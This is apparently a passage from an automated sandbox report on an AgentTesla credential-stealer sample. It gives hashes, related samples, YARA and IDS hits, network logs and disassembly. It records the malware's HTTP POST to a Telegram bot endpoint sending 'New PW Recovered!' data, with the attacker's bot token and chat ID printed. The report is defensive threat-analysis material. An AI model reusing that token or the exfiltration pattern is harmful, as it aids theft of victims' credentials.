                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        No simulations
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        149.154.167.220e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                          Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                            X1.exeGet hashmaliciousXWormBrowse
                                              Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                X2.exeGet hashmaliciousXWormBrowse
                                                  HS202410407 Elemento de proyecto MSMU5083745.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                    171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                      gmb.xlsGet hashmaliciousUnknownBrowse
                                                        z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                          e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            api.telegram.orge-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            explorer.exeGet hashmaliciousRedLine, XWormBrowse
                                                            • 149.154.167.220
                                                            X1.exeGet hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                            • 149.154.167.220
                                                            X2.exeGet hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            HS202410407 Elemento de proyecto MSMU5083745.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            gmb.xlsGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            TELEGRAMRUe-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            X1.exeGet hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                            • 149.154.167.220
                                                            X2.exeGet hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            HS202410407 Elemento de proyecto MSMU5083745.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            gmb.xlsGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            SecuriteInfo.com.Trojan.Nekark.22288.17032.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.99
                                                            https://telegrambot-fix.pages.dev/bot.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 149.154.167.99
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0eload_startup.txt.ps1Get hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            M_F+niestandardowy stempel.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            F#U0130YAT TEKL#U0130F.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                            • 149.154.167.220
                                                            New DHL Shipment Document Arrival Notice.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            hesaphareketi_1.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            DAIKIN AC SPAIN 2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            • 149.154.167.220
                                                            transferencia.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            • 149.154.167.220
                                                            No context
                                                            No created / dropped files found
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):4.993273203425258
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
                                                            File size:243'200 bytes
                                                            MD5:ab696103426e266ed3729c899e11e778
                                                            SHA1:12aa01403e8f348853598d6da5b304da02cc3d57
                                                            SHA256:7151fdf1eb6797e332cdd21c6084e1b338f84fb6652284599370cf609776a676
                                                            SHA512:df792f6ec7c1be0beaf28d66a65939769c3a22906b8ad27b1adb7c8b2550e31a958d590f75d5aace2b9df3ca20ed976c665bc0e470c12307620c94133b4d6c50
                                                            SSDEEP:3072:/dcBPLoH7/bX6xMlxNiIfneSi3gpzUiJ5LIJyEOC2i:/dcBPUH7/bXSMlxNiI/eSNoiQJy99
                                                            TLSH:81341F037E88EB15E1A87E3782EF2D2413B2B4C71633D60B5F49AF6618512825D7E72D
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t3&f................................. ........@.. ....................... ............@................................
                                                            Icon Hash:90cececece8e8eb0
                                                            Entrypoint:0x43ca0e
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x66263374 [Mon Apr 22 09:52:52 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3c9bc0x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3e0000x546.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x400000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x3aa140x3ac001c15002a6313e0f43c3a612bd7a823c6False0.35701878324468084data5.004610180764335IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x3e0000x5460x600e8a581ef34c099bfb41ac9cfb5e0303eFalse0.4010416666666667data4.000397557777239IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x400000xc0x200e7e1830b66ec557bbe5d536c0541697cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0x3e0a00x2bcdata0.44
                                                            RT_MANIFEST0x3e35c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                            DLLImport
                                                            mscoree.dll_CorExeMain
                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            04/24/24-10:16:17.850504TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49730443192.168.2.4149.154.167.220
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Apr 24, 2024 10:16:16.487485886 CEST49730443192.168.2.4149.154.167.220
                                                            Apr 24, 2024 10:16:16.487541914 CEST44349730149.154.167.220192.168.2.4
                                                            Apr 24, 2024 10:16:16.487649918 CEST49730443192.168.2.4149.154.167.220
                                                            Apr 24, 2024 10:16:16.497437954 CEST49730443192.168.2.4149.154.167.220
                                                            Apr 24, 2024 10:16:16.497464895 CEST44349730149.154.167.220192.168.2.4
                                                            Apr 24, 2024 10:16:17.424274921 CEST44349730149.154.167.220192.168.2.4
                                                            Apr 24, 2024 10:16:17.424372911 CEST49730443192.168.2.4149.154.167.220
                                                            Apr 24, 2024 10:16:17.427475929 CEST49730443192.168.2.4149.154.167.220
                                                            Apr 24, 2024 10:16:17.427486897 CEST44349730149.154.167.220192.168.2.4
                                                            Apr 24, 2024 10:16:17.427742004 CEST44349730149.154.167.220192.168.2.4
                                                            Apr 24, 2024 10:16:17.470088959 CEST49730443192.168.2.4149.154.167.220
                                                            Apr 24, 2024 10:16:17.491588116 CEST49730443192.168.2.4149.154.167.220
                                                            Apr 24, 2024 10:16:17.532156944 CEST44349730149.154.167.220192.168.2.4
                                                            Apr 24, 2024 10:16:17.850373030 CEST49730443192.168.2.4149.154.167.220
                                                            Apr 24, 2024 10:16:17.850410938 CEST44349730149.154.167.220192.168.2.4
                                                            Apr 24, 2024 10:16:18.090320110 CEST44349730149.154.167.220192.168.2.4
                                                            Apr 24, 2024 10:16:18.142000914 CEST49730443192.168.2.4149.154.167.220
                                                            Apr 24, 2024 10:16:18.399952888 CEST44349730149.154.167.220192.168.2.4
                                                            Apr 24, 2024 10:16:18.400059938 CEST44349730149.154.167.220192.168.2.4
                                                            Apr 24, 2024 10:16:18.400156975 CEST49730443192.168.2.4149.154.167.220
                                                            Apr 24, 2024 10:16:18.410449982 CEST49730443192.168.2.4149.154.167.220
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Apr 24, 2024 10:16:16.323823929 CEST6262153192.168.2.41.1.1.1
                                                            Apr 24, 2024 10:16:16.478054047 CEST53626211.1.1.1192.168.2.4
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Apr 24, 2024 10:16:16.323823929 CEST192.168.2.41.1.1.10x27d4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Apr 24, 2024 10:16:16.478054047 CEST1.1.1.1192.168.2.40x27d4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                            • api.telegram.org
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449730149.154.167.2204433872C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-24 08:16:17 UTC260OUTPOST /bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocument HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=---------------------------8dc64479371e3d5
                                                            Host: api.telegram.org
                                                            Content-Length: 914
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            2024-04-24 08:16:17 UTC914OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 34 34 37 39 33 37 31 65 33 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 35 38 30 38 37 30 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 34 34 37 39 33 37 31 65 33 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 32 34 2f 32 30 32 34 20 31 30 3a 31 36 3a 31 35 0a 55 73 65 72 20
                                                            Data Ascii: -----------------------------8dc64479371e3d5Content-Disposition: form-data; name="chat_id"595808702-----------------------------8dc64479371e3d5Content-Disposition: form-data; name="caption"New PW Recovered!Time: 04/24/2024 10:16:15User
                                                            2024-04-24 08:16:18 UTC25INHTTP/1.1 100 Continue
                                                            2024-04-24 08:16:18 UTC402INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 24 Apr 2024 08:16:18 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 56
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            {"ok":false,"error_code":400,"description":"Logged out"}


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Target ID:0
                                                            Start time:10:16:15
                                                            Start date:24/04/2024
                                                            Path:C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe"
                                                            Imagebase:0x7ff7699e0000
                                                            File size:243'200 bytes
                                                            MD5 hash:AB696103426E266ED3729C899E11E778
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2889163730.00000000026DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2889163730.00000000026BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:10.6%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:21
                                                              Total number of Limit Nodes:2
                                                              execution_graph 11957 6470c50 11961 6470c62 11957->11961 11965 6470c70 11957->11965 11958 6470c5a 11962 6470c69 11961->11962 11962->11962 11963 6470d0a CallWindowProcW 11962->11963 11964 6470cb9 11962->11964 11963->11964 11964->11958 11966 6470cb2 11965->11966 11968 6470cb9 11965->11968 11967 6470d0a CallWindowProcW 11966->11967 11966->11968 11967->11968 11968->11958 11969 6472f68 11970 6473270 11969->11970 11971 6472f90 11969->11971 11972 6472f99 11971->11972 11975 64723d4 11971->11975 11974 6472fbc 11976 64723df 11975->11976 11978 64732b3 11976->11978 11979 64723f0 11976->11979 11978->11974 11980 64732e8 OleInitialize 11979->11980 11982 647334c 11980->11982 11982->11978
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9ce380bfda1c816daf5381c35d079f2a9d0a3bb11c8c477ca6cbd715a960efe5
                                                              • Instruction ID: 025752b99bd3de621a88162b96b9be8f50a5da666b5f34a005559b3a2afc480b
                                                              • Opcode Fuzzy Hash: 9ce380bfda1c816daf5381c35d079f2a9d0a3bb11c8c477ca6cbd715a960efe5
                                                              • Instruction Fuzzy Hash: 3353E731C10B1A8ACB51EF68C8906D9F7B1FF99300F15D79AE45877221EB70AAD5CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4865c3a3568ae210103e8d011fdee25a80eb831532600d88845f393a74df758f
                                                              • Instruction ID: 7720e5e6860fcb5ba968c0e94cb57c1c5c9d6766a03e73ad2115eb3691540826
                                                              • Opcode Fuzzy Hash: 4865c3a3568ae210103e8d011fdee25a80eb831532600d88845f393a74df758f
                                                              • Instruction Fuzzy Hash: 11332D31D107198ECB11EF68C8906EDF7B1FF99300F55D69AE458A7221EB70AAC5CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1641 25b4a48-25b4aae 1643 25b4af8-25b4afa 1641->1643 1644 25b4ab0-25b4abb 1641->1644 1645 25b4afc-25b4b15 1643->1645 1644->1643 1646 25b4abd-25b4ac9 1644->1646 1653 25b4b61-25b4b63 1645->1653 1654 25b4b17-25b4b23 1645->1654 1647 25b4acb-25b4ad5 1646->1647 1648 25b4aec-25b4af6 1646->1648 1650 25b4ad9-25b4ae8 1647->1650 1651 25b4ad7 1647->1651 1648->1645 1650->1650 1652 25b4aea 1650->1652 1651->1650 1652->1648 1656 25b4b65-25b4b7d 1653->1656 1654->1653 1655 25b4b25-25b4b31 1654->1655 1657 25b4b33-25b4b3d 1655->1657 1658 25b4b54-25b4b5f 1655->1658 1662 25b4b7f-25b4b8a 1656->1662 1663 25b4bc7-25b4bc9 1656->1663 1660 25b4b3f 1657->1660 1661 25b4b41-25b4b50 1657->1661 1658->1656 1660->1661 1661->1661 1664 25b4b52 1661->1664 1662->1663 1665 25b4b8c-25b4b98 1662->1665 1666 25b4bcb-25b4be3 1663->1666 1664->1658 1667 25b4bbb-25b4bc5 1665->1667 1668 25b4b9a-25b4ba4 1665->1668 1673 25b4c2d-25b4c2f 1666->1673 1674 25b4be5-25b4bf0 1666->1674 1667->1666 1669 25b4ba8-25b4bb7 1668->1669 1670 25b4ba6 1668->1670 1669->1669 1672 25b4bb9 1669->1672 1670->1669 1672->1667 1675 25b4c31-25b4ca4 1673->1675 1674->1673 1676 25b4bf2-25b4bfe 1674->1676 1685 25b4caa-25b4cb8 1675->1685 1677 25b4c21-25b4c2b 1676->1677 1678 25b4c00-25b4c0a 1676->1678 1677->1675 1680 25b4c0e-25b4c1d 1678->1680 1681 25b4c0c 1678->1681 1680->1680 1682 25b4c1f 1680->1682 1681->1680 1682->1677 1686 25b4cba-25b4cc0 1685->1686 1687 25b4cc1-25b4d21 1685->1687 1686->1687 1694 25b4d23-25b4d27 1687->1694 1695 25b4d31-25b4d35 1687->1695 1694->1695 1696 25b4d29 1694->1696 1697 25b4d37-25b4d3b 1695->1697 1698 25b4d45-25b4d49 1695->1698 1696->1695 1697->1698 1701 25b4d3d 1697->1701 1699 25b4d4b-25b4d4f 1698->1699 1700 25b4d59-25b4d5d 1698->1700 1699->1700 1702 25b4d51 1699->1702 1703 25b4d5f-25b4d63 1700->1703 1704 25b4d6d-25b4d71 1700->1704 1701->1698 1702->1700 1703->1704 1705 25b4d65 1703->1705 1706 25b4d73-25b4d77 1704->1706 1707 25b4d81-25b4d85 1704->1707 1705->1704 1706->1707 1708 25b4d79-25b4d7c call 25b0ab8 1706->1708 1709 25b4d87-25b4d8b 1707->1709 1710 25b4d95 1707->1710 1708->1707 1709->1710 1712 25b4d8d-25b4d90 call 25b0ab8 1709->1712 1714 25b4d96 1710->1714 1712->1710 1714->1714
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cadf0ff645bde41a4365fdd537dec46c33e57949e20a836f225b6d37b8e957ae
                                                              • Instruction ID: c3600cd837def626cc8bee3cf97970ecbfc26113453040df65bc9531ae90fde6
                                                              • Opcode Fuzzy Hash: cadf0ff645bde41a4365fdd537dec46c33e57949e20a836f225b6d37b8e957ae
                                                              • Instruction Fuzzy Hash: 24B16C70E002098FDF21CFA8D8A57EDBBF2BF88714F148529D815EB295EB749845CB85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
